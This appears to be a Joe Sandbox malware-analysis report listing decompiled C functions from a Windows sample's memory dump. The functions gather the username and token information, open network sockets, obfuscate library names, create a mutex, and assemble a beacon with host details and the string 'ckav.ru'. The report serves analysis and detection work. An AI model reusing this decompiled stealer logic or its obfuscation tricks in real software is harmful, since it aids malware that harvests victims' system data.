Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
